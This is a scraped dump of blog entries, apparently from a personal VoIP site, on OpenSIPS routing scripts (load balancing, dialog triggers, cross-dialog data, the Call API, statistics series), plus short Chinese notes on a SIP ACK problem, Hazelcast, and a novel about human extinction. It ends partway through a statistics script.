modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;db_url\u0026#34;,\u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) # ping every 30 secs the failed destinations modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;probing_interval\u0026#34;, 30) modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;probing_from\u0026#34;, \u0026#34;sip:pinger@LB_IP:LB_PORT\u0026#34;) # consider positive ping reply the 404 modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;probing_reply_codes\u0026#34;, \u0026#34;404\u0026#34;) route{ if (!mf_process_maxfwd_header(\u0026#34;3\u0026#34;)) { send_reply(\u0026#34;483\u0026#34;,\u0026#34;looping\u0026#34;); exit; } if ( has_totag() ) { # sequential request -\u0026gt; obey Route indication loose_route(); t_relay(); exit; } # handle cancel and re-transmissions if ( is_method(\u0026#34;CANCEL\u0026#34;) ) { if ( t_check_trans() ) t_relay(); exit; } # from now on we have only the initial requests if (!is_method(\u0026#34;INVITE\u0026#34;)) { send_reply(\u0026#34;405\u0026#34;,\u0026#34;Method Not Allowed\u0026#34;); exit; } # initial request record_route(); # not really necessary to create the dialog from script (as the # LB functions will do this for us automatically), but we do it # if we want to pass some flags to dialog (pinging, bye, etc) create_dialog(\u0026#34;B\u0026#34;); # check the direction of call if ( lb_is_destination(\u0026#34;$si\u0026#34;,\u0026#34;$sp\u0026#34;,\u0026#34;1\u0026#34;) ) { # call comes from our cluster, so it is an PSNT inbound call # mark it as load on the corresponding destination lb_count_call(\u0026#34;$si\u0026#34;,\u0026#34;$sp\u0026#34;,\u0026#34;1\u0026#34;, \u0026#34;pstn\u0026#34;); # and route is to our main sip server to send call to end user $du = \u0026#34;sip:PROXY_IP:PORXY_PORT\u0026#34;; # REPLACE here with right values t_relay(); exit; } # detect resources and store in an AVP if ( $rU=~\u0026#34;^VM_\u0026#34; ) { # looks like a VoiceMail call $avp(lb_res) = \u0026#34;vm\u0026#34;; } else if ( $rU=~\u0026#34;^[0-9]+$\u0026#34; ) { # PSTN call $avp(lb_res) = \u0026#34;pstn\u0026#34;; } else { send_reply(\u0026#34;404\u0026#34;,\u0026#34;Destination not found\u0026#34;); exit; } # LB function returns negative if no suitable destination (for requested resources) is found, # or if all destinations are full if ( !load_balance(\u0026#34;1\u0026#34;,\u0026#34;$avp(lb_res)\u0026#34;) ) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Service full\u0026#34;); exit; } xlog(\u0026#34;Selected destination is: $du\\n\u0026#34;); # arm a failure route for be able to catch a failure event and to do # failover to the next available destination t_on_failure(\u0026#34;LB_failed\u0026#34;); # send it out if (!t_relay()) { sl_reply_error(); } } failure_route[LB_failed] { # skip if call was canceled if (t_was_cancelled()) { exit; } # was a destination failure ? (we do not want to do failover # if it was a call setup failure, so we look for 500 and 600 # class replied and for local timeouts) if ( t_check_status(\u0026#34;[56][0-9][0-9]\u0026#34;) || (t_check_status(\u0026#34;408\u0026#34;) \u0026amp;\u0026amp; t_local_replied(\u0026#34;all\u0026#34;) ) ) { # this is a case for failover xlog(\u0026#34;REPORT: LB destination $du failed with code $T_reply_code\\n\u0026#34;); # mark failed destination as disabled lb_disable(); # try to re-route to next available destination if ( !load_balance(\u0026#34;1\u0026#34;,\u0026#34;$avp(lb_res)\u0026#34;) ) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Service full\u0026#34;); exit; } xlog(\u0026#34;REPORT: re-routing call to $du \\n\u0026#34;); t_relay(); } } ","permalink":"https://wdd.js.org/opensips/blog/load-balance/","summary":"https://opensips.org/Documentation/Tutorials-LoadBalancing-1-9\n1. Load Balancing in OpenSIPS The \u0026ldquo;load-balancing\u0026rdquo; module comes to provide traffic routing based on load. Shortly, when OpenSIPS routes calls to a set of destinations, it is able to keep the load status (as number of ongoing calls) of each destination and to choose to route to the less loaded destination (at that moment). OpenSIPS is aware of the capacity of each destination - it is pre-configured with the maximum load accepted by the destinations.","title":"Load Balancing in OpenSIPS"},{"content":"通过sngrep抓包发现,通话正常,ACK无法送到FS。导致通话一段时间后,FS因为没有收到ACK,就发送了BYE来挂断呼叫。\nsngrep定位到问题可能出在OpenSIPS上,然后分析opensips的日志。\nMar 9 16:58:00 dd opensips[84]: ERROR:dialog:dlg_validate_dialog: failed to validate remote contact: dlg=[sip:9999@192.168.2.161:5080;transport=udp] , req =[sip:192.168.2.109:18627;lr;ftag=CX3CDinLARXn1ZRNIlPaFexgirQczdr7;did=4c1.a9657441] 上面的日志,提示问题出在dialog验证上,dialog验证失败的原因可能与contact头有关。\n然后我有仔细的分析了一下SIP转包。发现contact中的ip地址192.168.2.161并不是fs的地址。但是它为什么会出现在fs回的200ok中呢?\n这是我就想起了fs vars.xml,其中有几个参数是用来配置服务器的ip地址的。\n由于我的fs是个树莓派,ip是自动分配的,重启之后,可能获取了新的ip。但是老的ip地址,还是存在于vars.xml中。\n然后我就去排查了一下fs的var.xml, 发现下面三个参数都是192.168.2.161, 但是实际上树莓派的地址已经不是这个了。\nbind_server_ip external_rtp_ip external_sip_ip 解决方案:改变fs vars.xml中的地址配置信息,然后重启fs。\n除了fs的原因,还有一部分原因可能是错误的使用了fix_nated_contact。**务必记住:对于位于边界的SIP服务器来说,对于进入的SIP请求,一般需要fix_nated_contaced。对于这个请求的响应,则不需要进行nat处理。\n深入思考一下,为什么concact头修改的错了,往往ack就会有问题呢? 实际上ack请求的url部分,就是由响应消息的contact头的ulr部分。\n","permalink":"https://wdd.js.org/opensips/ch7/miss-ack/","summary":"通过sngrep抓包发现,通话正常,ACK无法送到FS。导致通话一段时间后,FS因为没有收到ACK,就发送了BYE来挂断呼叫。\nsngrep定位到问题可能出在OpenSIPS上,然后分析opensips的日志。\nMar 9 16:58:00 dd opensips[84]: ERROR:dialog:dlg_validate_dialog: failed to validate remote contact: dlg=[sip:9999@192.168.2.161:5080;transport=udp] , req =[sip:192.168.2.109:18627;lr;ftag=CX3CDinLARXn1ZRNIlPaFexgirQczdr7;did=4c1.a9657441] 上面的日志,提示问题出在dialog验证上,dialog验证失败的原因可能与contact头有关。\n然后我有仔细的分析了一下SIP转包。发现contact中的ip地址192.168.2.161并不是fs的地址。但是它为什么会出现在fs回的200ok中呢?\n这是我就想起了fs vars.xml,其中有几个参数是用来配置服务器的ip地址的。\n由于我的fs是个树莓派,ip是自动分配的,重启之后,可能获取了新的ip。但是老的ip地址,还是存在于vars.xml中。\n然后我就去排查了一下fs的var.xml, 发现下面三个参数都是192.168.2.161, 但是实际上树莓派的地址已经不是这个了。\nbind_server_ip external_rtp_ip external_sip_ip 解决方案:改变fs vars.xml中的地址配置信息,然后重启fs。\n除了fs的原因,还有一部分原因可能是错误的使用了fix_nated_contact。**务必记住:对于位于边界的SIP服务器来说,对于进入的SIP请求,一般需要fix_nated_contaced。对于这个请求的响应,则不需要进行nat处理。\n深入思考一下,为什么concact头修改的错了,往往ack就会有问题呢? 实际上ack请求的url部分,就是由响应消息的contact头的ulr部分。","title":"ACK 无法正常送到FS"},{"content":"","permalink":"https://wdd.js.org/posts/2021/03/ewinve/","summary":"","title":"stompjs 心跳机制调研"},{"content":"IDMG是 IN-MEMORY DATA GRID的缩写。\n官方的一句话介绍:\nThe industry\u0026rsquo;s fastest, most scalable in-memory data grid, where speed, scalability and continuous processing are the core requirements for deployment.\n抽取关键词:\n快 可伸缩 内存 分布式 简介 An IMDG (in-memory data grid) is a set of networked/clustered computers that pool together their random access memory (RAM) to let applications share data structures with other applications running in the cluster.\nThe primary advantage is speed, which has become critical in an environment with billions of mobile, IoT devices and other sources continuously streaming data. With all relevant information in RAM in an IMDG, there is no need to traverse a network to remote storage for transaction processing. The difference in speed is significant – minutes vs. sub-millisecond response times for complex transactions done millions of times per second.\n参考 https://hazelcast.com/products/imdg/ 管理中心 https://github.com/hazelcast/management-center-docker https://github.com/hazelcast/hazelcast-docker https://github.com/hazelcast/hazelcast-nodejs-client/blob/master/DOCUMENTATION.md https://docs.hazelcast.com/imdg/latest/clusters/discovering-by-tcp.html 文档 https://docs.hazelcast.com/imdg/latest/clusters/discovering-by-tcp.html ","permalink":"https://wdd.js.org/posts/2021/02/xlwnvv/","summary":"IDMG是 IN-MEMORY DATA GRID的缩写。\n官方的一句话介绍:\nThe industry\u0026rsquo;s fastest, most scalable in-memory data grid, where speed, scalability and continuous processing are the core requirements for deployment.\n抽取关键词:\n快 可伸缩 内存 分布式 简介 An IMDG (in-memory data grid) is a set of networked/clustered computers that pool together their random access memory (RAM) to let applications share data structures with other applications running in the cluster.\nThe primary advantage is speed, which has become critical in an environment with billions of mobile, IoT devices and other sources continuously streaming data.","title":"hazelcast IDMG"},{"content":"","permalink":"https://wdd.js.org/posts/2021/02/egkbht/","summary":"","title":"macbook pro 1708 换电池记录"},{"content":"人类将以什么方式走向灭绝,很多科幻电影中都有过设想。\n最近读到一本书《人类灭绝》来自日本作家高野和明的科幻小说给出系统的介绍。小说中有一份报告,叫做《海斯曼报告》。\n下面表格中的1-5是报告中提到的人类灭绝方式,6-7是我自己添加。\n种类 类别 举例 相关电影,或者书籍 1 宇宙规模的灾难 小行星撞地球,太阳燃尽 2 地球规模的环境变动 地球磁场的南北逆转现象,环境污染 《2012》《后天》 3 核战 二战 日本 核武器 4 疫病 病毒威胁 生物武器 电影生化危机,今年的新冠肺炎疫情,HIV 《生化危机》《行尸走肉》 5 人类进化 由于基因突变,产生更加智能的人类 《东京食尸鬼》《人类灭绝》 6 AI失控 人工智能出现自我意识 《我,机器人》《终结者系列》《黑客帝国系列》 7 外星人入侵 高层次文明入侵低层次文明 《三体》 于三体不同的是,作者从人类第5种可能性展开小说。如果你喜欢三体的话,《人类灭绝》这本小说,也是非常值得一读的。\n","permalink":"https://wdd.js.org/posts/2021/02/ploder/","summary":"人类将以什么方式走向灭绝,很多科幻电影中都有过设想。\n最近读到一本书《人类灭绝》来自日本作家高野和明的科幻小说给出系统的介绍。小说中有一份报告,叫做《海斯曼报告》。\n下面表格中的1-5是报告中提到的人类灭绝方式,6-7是我自己添加。\n种类 类别 举例 相关电影,或者书籍 1 宇宙规模的灾难 小行星撞地球,太阳燃尽 2 地球规模的环境变动 地球磁场的南北逆转现象,环境污染 《2012》《后天》 3 核战 二战 日本 核武器 4 疫病 病毒威胁 生物武器 电影生化危机,今年的新冠肺炎疫情,HIV 《生化危机》《行尸走肉》 5 人类进化 由于基因突变,产生更加智能的人类 《东京食尸鬼》《人类灭绝》 6 AI失控 人工智能出现自我意识 《我,机器人》《终结者系列》《黑客帝国系列》 7 外星人入侵 高层次文明入侵低层次文明 《三体》 于三体不同的是,作者从人类第5种可能性展开小说。如果你喜欢三体的话,《人类灭绝》这本小说,也是非常值得一读的。","title":"人类灭绝的7种方式"},{"content":"原文:https://blog.opensips.org/2020/05/18/cross-dialog-data-accessing/\nThere are several calling scenarios – typical Class V – where multiple SIP dialogs may be involved. And to make it work, you need, from one dialog, to access the data that belongs to another dialog. By data we mean here dialog specific data, like dialog variables, profiles or flags, and, even more, accounting data (yes, the accounting engine is so powerful that it ended be used for storing a lot of information during the calls).Let’s take a quick look at a couple of such scenarios:\nattended call transfer – the new call may need to import data (about the involved parties) from the old dialog; call parking – the retrieving call will need to import a lot of data (again, about the parties involved and the nature of the call) from the parked call call pickup – the picking up call will also have to access data from the ringing calls in order to find them, check permissions and grab one call. Scratching the surface, before OpenSIPS 3.1 The pre 3.1 OpenSIPS versions had some limited possibilities when comes to accessing the data from other dialogs.Historically speaking, the first attempt was the get_dialog_info() function, a quite primitive approach that allows you, using the dialog variables, to find a dialog and to retrieve from it only one dialog variable. Even so, this function served the purpose of addressing scenarios where you wanted to group dialogs around custom values – this solved the problem of a front-end OpenSIPS balancer trying to group all calls of a conf room on the same conf server, or trying to group the calls of a user on the same PBX (so call transfer will work).But there were some**_ limitations in terms of scalability_** (only one value was retrieved) and usage, on how the dialogs were referred (by dlg variables, not by the more natural call-id).So we had the next wave of functions that addressed that issues : the get_dialog_vals(), get_dialogs_by_val() or get_dialogs_by_profile() functions. They solved somehow the problem allowing a more versatile way of referring/identifying the dialogs and allowing a bulk access to the dialog data, but still, not all dialog data was accessible and the the way the data was returned (it complex arrays or json strings) makes them**_ difficult to use_**.\nThe true solution, with OpenSPIS 3.1 So back to the drawing board. And the correct solution to the problem (of inter dialog data accessing) come from a totally different, much simpler approach – give direct access to the dialog context, so every piece of dialog data will be accessible via the regular dialog functions/variables/profiles/flags/etc/.So, OpenSIPS 3.1 gives you the possibility to load the context of a different dialog, so you can retrieve whatever data without the need of additional functions or special data packing or re-formatting.Two simple functions were added, the load_dialog_ctx() and unload_dialog_ctx(). These two functions may be used to define a region in your script where “you see” a different dialog than the current one (dictated by the SIP traffic). Inside that region, all the dialog functions and variables will operate on the other dialog. Simple and very handy, right ?To make it even better, the OpenSIPS 3.1 gives you more than only the access to another dialog context – it gives you the possibility to**_ access the accounting context of another call_**. Shortly, you can access the accounting variables (extra data or per-leg data) of a different call – isn’t that cool ?This can be done via the acc_load_ctx_from_dlg() and acc_unload_ctx_from_dlg() functions, in the similar way to the loading/unloading the dialog context. Inside the region defined by these new accounting function, you will “see” the accounting data of another call.\nExample Let’s take the example of an attended transfer, when handling the transferring call. This snippet will show we can get access to various dialog and accounting data from the transferred dialog , while handling the transferring dialog.\n","permalink":"https://wdd.js.org/opensips/blog/cross-dialog-data/","summary":"原文:https://blog.opensips.org/2020/05/18/cross-dialog-data-accessing/\nThere are several calling scenarios – typical Class V – where multiple SIP dialogs may be involved. And to make it work, you need, from one dialog, to access the data that belongs to another dialog. By data we mean here dialog specific data, like dialog variables, profiles or flags, and, even more, accounting data (yes, the accounting engine is so powerful that it ended be used for storing a lot of information during the calls).","title":"Cross-dialog data accessing"},{"content":"原文:https://blog.opensips.org/2020/05/26/dialog-triggers-or-how-to-control-the-calls-from-script/\nThe OpenSIPS script is a very powerful tool, both in terms of capabilities (statements, variables, transformations) and in terms of integration (support for DB, REST, Events and more).So why not using the OpenSIPS script (or the script routes) to interact and control your call, in order to build more complex services on top of the dialog support?For this purpose, OpenSIPS 3.1 introduces three new per-dialog triggers:\non_answer route, triggered when the dialog is answered; on_timeout route, triggered when the dialog is about to timeout; on_hangup route, triggered after the dialog was terminated. The routes are optional and per-dialog and they give you the possibility to attach custom operations to the various critical milestones in a dialog life.While the on_answer and on_hangup routes are 100% data-manipulation oriented (you have full read/write access to the full data context of the dialog, but you cannot change anything about the dialog progress), the on_timeout route is a bit more versatile – by increasing the dialog’s timeout, you can dynamically increase the dialog lifetime (to postpone the dialog timeout, without waiting for any signalling to do it).But let’s talk example 🙂\nSimple PrePaid Using the on_timeout route, we can simulate the incremental check and charge behavior of a basic prepaid.For example, we set 5 seconds timeout for the dialog and when the on_timeout route is triggered (after the 5 secs), we can re-check if the caller still have credit to continue the call. If not, we leave the call to timeout, to be terminated by the OpenSIPS. If he still has credit, we deduct the cost for 5 secs more and we increase the dialog timeout is 5 more seconds. Simple, right ?\nroute { .... create_dialog(\u0026#34;B\u0026#34;); # remember some billing account id, to remember # where to check for credit $dlg_val(account_id) = \u0026#34;...\u0026#34;; # keep a running cost for the call also $dlg_val(total_cost) = 0; # start with an initial 5 seconds duration $DLG_tiemout = 5; t_on_timeout(\u0026#34;call_recheck\u0026#34;); t_on_hangup(\u0026#34;call_terminated\u0026#34;); .... } route[call_recheck] { # the dialog data (vars, flags, profiles) are accesible here. xlog(\u0026#34;[$DLG_id] dialog timeout triggered\\n\u0026#34;); # calculate the cost for the next 5 seconds $var(cost) = 5 * .... ; # use a critical/locked region to do test and update upon the credit get_dynamic_lock( \u0026#34;$dlg_val(account_id)\u0026#34; ); if (avp_db_query(\u0026#34;select credit from accounts where credit\u0026gt;=$var(cost) and id=$dlg_val(account_id)\u0026#34;)) { # credit is stil available avp_db_query(\u0026#34;update accounts set credit=credit-$var(cost) where id=$dlg_val(account_id)\u0026#34;); # give the dialog 5 more seconds $DLG_timeout = 5; # update the total cost $dlg_val(total_cost) = $(dlg_val(total_cost){s.int}) + $var(cost); } else { # query returned nothing, so no credit is available, allow the call # to timeout and terminate right away } release_dynamic_lock( \u0026#34;$dlg_val(account_id)\u0026#34; ); } route[call_terminated] { # the dialog data (vars, flags, profiles) are accesible here. xlog(\u0026#34;[$DLG_id] call terminated after $DLG_lifetime seconds with a cost of $dlg_val(total_cost)\\n\u0026#34;); # IMPROVEMENT - eventually ajust the call if the call didn\u0026#39;t used # the whole span of the last 5 seconds } SHARE THIS: ","permalink":"https://wdd.js.org/opensips/blog/dialog-trigers/","summary":"原文:https://blog.opensips.org/2020/05/26/dialog-triggers-or-how-to-control-the-calls-from-script/\nThe OpenSIPS script is a very powerful tool, both in terms of capabilities (statements, variables, transformations) and in terms of integration (support for DB, REST, Events and more).So why not using the OpenSIPS script (or the script routes) to interact and control your call, in order to build more complex services on top of the dialog support?For this purpose, OpenSIPS 3.1 introduces three new per-dialog triggers:\non_answer route, triggered when the dialog is answered; on_timeout route, triggered when the dialog is about to timeout; on_hangup route, triggered after the dialog was terminated.","title":"Dialog triggers, or how to control the calls from script"},{"content":" 看来OpenSIPS的目标已经不仅仅局限于做代理了,而是想做呼叫控制。\n原文:https://blog.opensips.org/2020/06/11/calls-management-using-the-new-call-api-tool/\nThe new Call API project consists of a standalone server able to serve a set of API commands that can be used to control SIP calls (such as start a new call, put a call on hold, transfer it to a different destination, etc.). In order to provide high performance throughput, the server has been developed in Go programming language, and provides a WebSocket interface that is able to handle Json-RPC 2.0 requests and notifies.Although it runs as a standalone daemon able to control calls, it does not directly interact with SIP calls, but just communicates with a SIP proxy that actually provides the SIP stack and intermediates the calls. The first release of the Call API is using OpenSIPS for this purposes, but this is a loose requirement – in the future other SIP stacks can be used, with the appropriate connectors.\nArchitecture In terms of architecture, the new Call API tool consists of multiple units, the most important ones being:\nClients interface – this unit is responsible for receiving Json-RPC requests over WebSocket from clients and pass them to the Commands unit Management interface – this is the unit that communicates with the SIP proxy in order to instruct what needs to be done Event interface – listens for event from the SIP proxy and passes them to the Commands unit Commands unit – this is the unit that implements the commands logic, ensuring the interaction between all the above interfaces. Communication between these units is done asynchronous using go-routines. Below you can find a diagram that shows how all these units are interconnected\nDemo Below you can watch a video that shows how you can use some of the features the Call API tool provides, such as:\nStart a call between two participants Put the call on hold Resume the call from hold Transfer a call to a different destination Terminate an ongoing call Enjoy watching!\n","permalink":"https://wdd.js.org/opensips/blog/calls-manager/","summary":"看来OpenSIPS的目标已经不仅仅局限于做代理了,而是想做呼叫控制。\n原文:https://blog.opensips.org/2020/06/11/calls-management-using-the-new-call-api-tool/\nThe new Call API project consists of a standalone server able to serve a set of API commands that can be used to control SIP calls (such as start a new call, put a call on hold, transfer it to a different destination, etc.). In order to provide high performance throughput, the server has been developed in Go programming language, and provides a WebSocket interface that is able to handle Json-RPC 2.","title":"Calls management using the new Call API tool"},{"content":" 早期1x和2x版本的OpenSIPS,统计模块只有两种模式,一种时计算值,另一种是从运行开始的累加值。而无法获取比如说最近一分钟,最近5分钟,这样的基于一定周期的统计值,在OpenSIPS 3.2上,提供了新的解决方案。\n原文:https://blog.opensips.org/2021/02/02/improved-series-based-call-statistics-using-opensips-3-2/\nReal-time call statistics is an excellent tool to evaluate the quality and performance of your telephony platform, that is why it is very important to expose as many statistics as possible, accumulated over different periods of time.OpenSIPS provides an easy to use interface that exposes simple primitives for creating, updating, and displaying various statistics, both well defined as well as tailored to your needs. However, the current implementation comes with a limitation: statistics are gathered starting from the beginning of the execution, up to the point they are read. In other words, you cannot gather statistics only for a limited time frame.That is why starting with OpenSIPS 3.2, the statistics module was enhanced with a new type of statistics, namely statistics series, that allow you to provide custom stats accumulated over a specific time window (such as one second, one minute, one hour, etc.). When the stat is evaluated, only the values gathered within the specified time window is accounted, all the others are simply dropped (similar to a time-based circular buffer, or a sliding window). Using these new stats, you can easily provide standard statistics such as ACD, AST, PPT, ASR, NER, CCR in a per minute/hour fashion.\nProfiles In order to use the statistics series you first need to define a statistics profile, which describes certain properties of the statistics to be used, such as:\nthe duration of the time frame to be used – the number of seconds worth of data that should be accumulated for the statistics that use this profile; all data gathered outside of this time window is discarded the granularity of the time window – the number of slots used for each series – the more slots, the more accurate the statistic is, with a penalty of an increased memory footprint how to group statistics to make them easier to process the processing algorithm – or how data should be accumulated and interpreted when the statistic is evaluated; this is presented in the next chapter The profile needs to be specified every time data is pushed in a statistic series, so that the engine knows how to process it.\nAlgorithms The statistics series algorithm describe how the data gathered over the specified time window should be processed. There are several algorithms available:\naccumulate – this is useful when you want to count the number of times a specific event appears (such as number of requests, replies, dialogs, etc); for this algorithm, the statistic is represented as a simple counter that accumulates when data is fed, and is decreased when data (out of the sliding window) expires average – this is used to compute an average value over the entire window frame; this is useful to compute average call duration (ACD) or average post dial delay (PDD) over a specified time window percentage – used to compute the percentage of some data out of a total number of entries; useful to compute different types of ratios, such as Answer-seizure ratio (ASR), NER or CCR Usage The new functionality can be leveraged by defining one (or more) stat_series_profiles, and then feed data to that statistic according to your script’s logic using the update_stat_series() function. In order to evaluate the result of the stats, one can use the $stat() variable from within OpenSIPS’s script, or access it from outside using the get_statistics MI command.As a quick theoretical example, let us consider creating two statistics: one that counts the number of initial INVITE requests per minute your platform receives, and another one that shows the ratio of the INVITE requests out of all the other requests received.First, we shall define the two profiles that describe how the new statistics should be interpreted: the first one, should be a counter that accumulates all the initial INVITEs received in one minute, and the second one should be a percentage series, is incremented for initial INVITEs, and decremented for all the others. Both statistics series will use a 60s (one minute) window:modparam(\u0026ldquo;statistics\u0026rdquo;, \u0026ldquo;stat_series_profile\u0026rdquo;, \u0026ldquo;inv_acc_per_min: algorithm=accumulate window=60\u0026rdquo;)modparam(\u0026ldquo;statistics\u0026rdquo;, \u0026ldquo;stat_series_profile\u0026rdquo;, \u0026ldquo;inv_perc_per_min: algorithm=percentage window=60\u0026rdquo;)Now, in the main route, we shell update statistics with data:\u0026hellip;route { \u0026hellip; if (is_method(\u0026ldquo;INVITE\u0026rdquo;) \u0026amp;\u0026amp; has_totag()) { update_stat_series(\u0026ldquo;inv_acc_per_min\u0026rdquo;, \u0026ldquo;INVITE_per_min\u0026rdquo;, \u0026ldquo;1\u0026rdquo;); update_stat_series(\u0026ldquo;inv_perc_per_min\u0026rdquo;, \u0026ldquo;INVITE_ratio\u0026rdquo;, \u0026ldquo;1\u0026rdquo;); } else { update_stat_series(\u0026ldquo;inv_perc_per_min\u0026rdquo;, \u0026ldquo;INVITE_ratio\u0026rdquo;, \u0026ldquo;-1\u0026rdquo;); } xlog(\u0026ldquo;INVITEs per min $stat(INVITE_per_min) represents $stat(INVITE_ratio)% of total requests\\n\u0026rdquo;); \u0026hellip;}\u0026hellip;You can query these statistics through the MI interface by running:opensips-cli -x mi get_statistics INVITE_per_min INVITE_ratio\nUse case In a production environment, the KPIs you provide your customers are very important, as they describe the quality of the service you provide. Some of these are quite standard indices (ACD, ASR, AST, PDD, NER, CCR), that are relevant for specific period of times (one minute, ten minutes, one hour). In the following paragraphs we will see how we can provide these statistics on a customer basis, as well as overall.First, we need to understand what each stat represents, to understand the logic that has to be scripted:\nASR (Answer Seizure Ratio) – the percentage of telephone calls which are answered (200 reply status code) CCR (Call Completion Ratio) – the percentage of telephone calls which are signaled back by the far-end client. Thus, 5xx, 6xx reply codes and internal 408 timeouts generated before reaching the client do not count here. The following is always true: CCR \u0026gt;= ASR _PDD (Post Dial Delay) _– the duration, in milliseconds, between the receival of the initial INVITE and the receival of the first 180/183 provisional reply (the call state advances to “ringing”) AST (Average Setup Time) – the duration, in milliseconds, between the receival of the initial INVITE and the receival of the first 200 OK reply (the call state advances to “answered”). The following is always true: AST \u0026gt;= PDD ACD (Average Call Duration) – the duration, in seconds, between the receival of the initial INVITE and the receival of the first BYE request from either participant (the call state advances to “ended”) NER (Network Effectiveness Ratio) – measures the ability of a server to deliver the call to the called terminal; in addition to ASR, NER also considers busy and user failures as success Now that we know what we want to see, we can start scripting: we need to load the statistics module, and define two types of profiles: one that computes average indices (used for AST, PDD, ACD), and one for percentage indices (used for ASR, NER, CCR). For each of them, we define 3 different time windows: per minute, per 10 minutes and per hour:\nloadmodule \u0026#34;statistics.so\u0026#34; modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;perc: algorithm=percentage group=stats\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;10m-perc: algorithm=percentage window=600 slots=10 group=stats_10m\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;1h-perc: algorithm=percentage window=3600 slots=6 group=stats_1h\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;avg: algorithm=average group=stats\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;10m-avg: algorithm=average window=600 slots=10 group=stats_10m\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;1h-avg: algorithm=average window=3600 slots=6 group=stats_1h\u0026#34;) In order to catch all the relevant events we need to hook on, we will be using the E_ACC_CDR and E_ACC_MISSED_EVENT events exposed by the accounting module. In order to have identify the customer that the events were triggered for, we need to export the customer’s identifier in the event:\nloadmodule \u0026#34;acc.so\u0026#34; modparam(\u0026#34;acc\u0026#34;, \u0026#34;extra_fields\u0026#34;,\u0026#34;evi: customer\u0026#34;) route { ... if (has_totag() \u0026amp;\u0026amp; is_method(\u0026#34;INVITE\u0026#34;)) { do_accounting(\u0026#34;evi\u0026#34;, \u0026#34;cdr|missed\u0026#34;); t_on_reply(\u0026#34;stats\u0026#34;); # store the moment the call started get_accurate_time($avp(call_start_s), $avp(call_start_us)); # TODO: store the customer\u0026#39;s id in $acc_extra(customer) } ... } When a reply comes in, our “stats” reply route will be called, where we will update all the statistics, according to our logic. Because we need to compute them twice, once for global statistics, and once for customer’s one, we will put the logic in a new route, “calculate_stats_reply”, that we call when a reply comes in:\nonreply_route[stats] { route(calculate_stats_reply, $avp(call_start_s), $avp(call_start_us), \u0026#34;\u0026#34;); route(calculate_stats_reply, $avp(call_start_s), $avp(call_start_us), $acc_extra(customer)); } route[calculate_stats_reply] { # expects: # - param 1: timestamp (in seconds) when the initial request was received # - param 2: timestamp (in microseconds) when the initial request was received # - param 3: statistic identifier; for global, empty string is used if ($rs == \u0026#34;180\u0026#34; || $rs == \u0026#34;183\u0026#34; || $rs == \u0026#34;200\u0026#34; || $rs == \u0026#34;400\u0026#34; || $rs == \u0026#34;403\u0026#34; || $rs == \u0026#34;408 || $rs == \u0026#34;480\u0026#34; || $rs == \u0026#34;487\u0026#34;) { if (!isflagset(\u0026#34;FLAG_PDD_CALCULATED\u0026#34;)) { get_accurate_time($var(now_s), $var(now_us)); ts_usec_delta($var(now_s), $var(now_us), $param(1), $param(2), $var(pdd_us)); $var(pdd_ms) = $var(pdd_us) / 1000; # milliseconds $avp(pdd) = $var(pdd_ms); setflag(\u0026#34;FLAG_PDD_CALCULATED\u0026#34;); } else { $var(pdd_ms) = $avp(pdd); } update_stat_series(\u0026#34;avg\u0026#34;, \u0026#34;PDD$param(3)\u0026#34;, $var(pdd_ms)); update_stat_series(\u0026#34;10m-avg\u0026#34;, \u0026#34;PDD_10m$param(3)\u0026#34;, $var(pdd_ms)); update_stat_series(\u0026#34;1h-avg\u0026#34;, \u0026#34;PDD_1h$param(3)\u0026#34;, $var(pdd_ms)); } if ($rs \u0026gt;= 200 \u0026amp;\u0026amp; $rs \u0026lt; 300) { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;ASR$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;ASR_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;ASR_1h$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;NER$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;NER_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;NER_1h$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;CCR$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;CCR_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;CCR_1h$param(3)\u0026#34;, 1); get_accurate_time($var(now_s), $var(now_us)); ts_usec_delta($var(now_s), $var(now_us), $param(1), $param(2), $var(ast_us)); $var(ast_us) = $var(ast_us) / 1000; # milliseconds update_stat_series(\u0026#34;avg\u0026#34;, \u0026#34;AST$param(3)\u0026#34;, $var(ast_us)); update_stat_series(\u0026#34;10m-avg\u0026#34;, \u0026#34;AST_10m$param(3)\u0026#34;, $var(ast_us)); update_stat_series(\u0026#34;1h-avg\u0026#34;, \u0026#34;AST_1h$param(3)\u0026#34;, $var(ast_us)); } } In case of a successful call, the dialog generates a CDR, that we use to update our ACD statistics:\nevent_route[E_ACC_CDR] { route(calculate_stats_cdr, $param(duration), $param(setuptime), \u0026#34;\u0026#34;); route(calculate_stats_cdr, $param(duration), $param(setuptime), $param(customer)); } route[calculate_stats_cdr] { # expects: # - param 1: duration (in seconds) of the call # - param 2: setuptime (in seconds) of the call # - param 3: optional - statistic identifier; global is empty string $var(total_duration) = $param(1) + $param(2); update_stat_series(\u0026#34;avg\u0026#34;, \u0026#34;ACD$param(3)\u0026#34;, $var(total_duration)); 